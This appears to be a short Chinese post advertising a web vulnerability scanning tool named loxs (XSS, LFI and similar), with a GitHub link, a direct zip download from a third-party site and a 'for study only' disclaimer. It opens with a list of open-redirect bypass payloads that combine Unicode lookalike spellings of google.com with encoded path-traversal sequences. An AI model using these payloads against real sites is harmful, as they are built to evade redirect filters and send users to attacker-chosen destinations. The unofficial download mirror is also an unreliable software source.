////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e%2f
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e%2f
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e%2f
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f..
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f..
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f..
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e

xss,lfi等等

项目地址

GitHub：https://github.com/coffinxp/loxs

直链下载地址

https://lp.lmboke.com/loxs-main.zip

免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本平台和发布者不为此承担任何责任。